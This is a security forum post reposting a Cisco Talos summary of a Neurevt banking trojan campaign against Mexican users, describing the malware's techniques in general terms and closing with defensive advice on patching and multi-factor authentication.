Neurevt Trojan Takes Aim at Mexican Users


Thread author
Staff member
Malware Hunter
Jul 27, 2015
  • Cisco Talos discovered a new version of the Neurevt trojan with spyware and backdoor capabilities in June 2021 using Cisco Secure Endpoint product telemetry.
  • This version of Neurevt appears to target users of Mexican financial institutions.
  • This threat demonstrates several techniques of the MITRE ATT&CK framework, most notably T1547 – Boot or Login Autostart Execution, T1055 - Process Injection, T1546 - Event-Triggered Execution, T1056 - Credential API Hooking, T1553 – Subvert Trust Controls, T1562 – Impair Defences, T1112 – Modify Registry, T1497 – Virtualization\Sandbox Evasion, T1083 - File and directory discovery, T1120 - Peripheral device discovery, T1057 - Process Discovery, T1012 - Query Registry, T1518 - Software Discovery and T1082 - System Information Discovery.

What's new?

Although Neurevt has been around for a while, recent samples in Cisco Secure Endpoint show that the actors combined this trojan with backdoors and information stealers. This trojan appears to target Mexican organizations. Talos is tracking these campaigns embedding URLs in the associated droppers, which belong to many major banks in Mexico.

How did it work?

The malware starts with an obfuscated PowerShell command that downloads an executable file belonging to the Neurevt family. The trojan drops other executables, scripts and files into the folders which it creates during runtime. The dropped payload ends up in a benign location of the filesystem and runs, thereby elevating its privilege by stealing service token information. It executes the following stages of the dropped executable file, which installs hook procedures to the monitor keystrokes and mouse input events. It captures the monitor screen and clipboard information. Then, Neurevt detects the virtualized and debugger environment, disables the firewall, modifies the internet proxy settings in the victim's machine to evade detections and thwart analysis. Instead of calling known APIs for HTTP communication, the malware uses System.Web Namespace and includes HTTP classes to enable the browser-server communication with the command and control (C2) server to exfiltrate the data.

So what?

Online banking users in Mexico should be cautious while operating their computers, accessing emails and attachments, and refrain from accessing unsecured websites. This trojan mostly steals the username and passwords of users on the sites and may also target other intellectual information. Organizations and individuals should keep their systems updated with the latest security patches for the operating systems and applications and enable multi-factor authentication on their accounts if possible.